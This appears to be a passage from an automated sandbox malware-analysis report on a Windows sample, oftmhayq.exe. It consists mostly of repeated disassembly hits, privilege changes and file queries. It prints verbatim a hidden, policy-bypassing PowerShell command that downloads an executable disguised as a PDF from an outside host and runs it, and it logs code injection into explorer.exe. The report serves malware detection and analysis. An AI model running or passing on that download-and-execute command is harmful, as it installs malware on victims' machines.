Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h] 29_2_0130F527
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h] 29_2_0130F527
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DAD30 mov eax, dword ptr fs:[00000030h] 29_2_012DAD30
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01393518 mov eax, dword ptr fs:[00000030h] 29_2_01393518
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01393518 mov eax, dword ptr fs:[00000030h] 29_2_01393518
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01393518 mov eax, dword ptr fs:[00000030h] 29_2_01393518
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137CD04 mov eax, dword ptr fs:[00000030h] 29_2_0137CD04
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h] 29_2_012FC577
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h] 29_2_012FC577
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h] 29_2_01314D51
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h] 29_2_01314D51
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D354C mov eax, dword ptr fs:[00000030h] 29_2_012D354C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D354C mov eax, dword ptr fs:[00000030h] 29_2_012D354C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138FD52 mov eax, dword ptr fs:[00000030h] 29_2_0138FD52
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01313D43 mov eax, dword ptr fs:[00000030h] 29_2_01313D43
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01353540 mov eax, dword ptr fs:[00000030h] 29_2_01353540
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01383D40 mov eax, dword ptr fs:[00000030h] 29_2_01383D40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F7D50 mov eax, dword ptr fs:[00000030h] 29_2_012F7D50
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01388D47 mov eax, dword ptr fs:[00000030h] 29_2_01388D47
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h] 29_2_01301DB5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h] 29_2_01301DB5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h] 29_2_01301DB5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h] 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h] 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h] 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013035A1 mov eax, dword ptr fs:[00000030h] 29_2_013035A1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h] 29_2_013A05AC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h] 29_2_013A05AC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h] 29_2_0130FD9B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h] 29_2_0130FD9B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3591 mov eax, dword ptr fs:[00000030h] 29_2_012D3591
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01388DF1 mov eax, dword ptr fs:[00000030h] 29_2_01388DF1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h] 29_2_012ED5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h] 29_2_012ED5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013095EC mov eax, dword ptr fs:[00000030h] 29_2_013095EC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D95F0 mov eax, dword ptr fs:[00000030h] 29_2_012D95F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D95F0 mov ecx, dword ptr fs:[00000030h] 29_2_012D95F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138FDD3 mov eax, dword ptr fs:[00000030h] 29_2_0138FDD3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D15C1 mov eax, dword ptr fs:[00000030h] 29_2_012D15C1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov ecx, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h] 29_2_01303C3E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h] 29_2_01303C3E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h] 29_2_01303C3E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D4439 mov eax, dword ptr fs:[00000030h] 29_2_012D4439
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130BC2C mov eax, dword ptr fs:[00000030h] 29_2_0130BC2C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h] 29_2_012EB433
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h] 29_2_012EB433
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h] 29_2_012EB433
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h] 29_2_012F2430
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h] 29_2_012F2430
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8C14 mov eax, dword ptr fs:[00000030h] 29_2_013A8C14
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A740D mov eax, dword ptr fs:[00000030h] 29_2_013A740D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A740D mov eax, dword ptr fs:[00000030h] 29_2_013A740D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A740D mov eax, dword ptr fs:[00000030h] 29_2_013A740D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8410 mov eax, dword ptr fs:[00000030h] 29_2_012D8410
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315C70 mov eax, dword ptr fs:[00000030h] 29_2_01315C70
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F746D mov eax, dword ptr fs:[00000030h] 29_2_012F746D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process token adjusted: Debug
Source: C:\Users\Public\oftmhayq.exe Process token adjusted: Debug
Source: C:\Users\Public\oftmhayq.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Injects a PE file into a foreign processes
Source: C:\Users\Public\oftmhayq.exe Memory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Memory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\oftmhayq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\oftmhayq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\oftmhayq.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\oftmhayq.exe Thread APC queued: target process: C:\Windows\explorer.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe Jump to behavior
Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001F.00000000.506248785.0000000006860000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
